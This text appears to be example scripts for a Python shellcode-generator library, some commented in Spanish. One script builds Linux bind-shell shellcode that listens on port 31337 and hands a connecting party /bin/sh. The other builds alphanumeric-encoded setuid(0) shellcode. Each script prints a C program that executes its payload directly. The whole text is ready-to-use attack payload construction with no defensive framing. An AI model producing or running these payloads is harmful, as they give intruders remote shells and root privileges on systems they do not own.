# Listen in all available addresses at port 31337 egg.socket(socket.AF_INET, socket.SOCK_STREAM) egg.bind(31337) egg.listen() # Got a connection, duplicate fd descriptors egg.accept() egg.dup2(2) egg.dup2(1) egg.dup2(0) # Uncomment to append 101 characters (NOPS) #egg.appendNops(101) # Run /bin/sh egg.execSh() # Exit cleanly egg.exit(0) sc = egg.getShellcode() print "#include <stdio.h>" print print 'char *sc="%s";' % sc print print "int main(void) {" print "\t((void(*)())sc)();" print "}" print
a = PyEgg("linux") gen = a.generator # Ejecutamos setuid(0) a.buf += gen.xorEax() a.buf += gen.xorEbx() a.buf += gen.call("setuid") # Saltamos los NOPs que generamos a continuacion a.buf += gen.jmpTo(3) # La generacion NOPs es aleatoria tal y como usted podria esperar a.buf += gen.nop(2) # Ahora simplemente salimos devolviendo 0 a.buf += gen.xorEax() a.buf += gen.call("exit") a.alphaEncode() sc = a.getShellcode() print "#include <stdio.h>" print print 'char *sc="%s";' % sc print print "int main(void) {" print "\t((void(*)())sc)();" print "}" print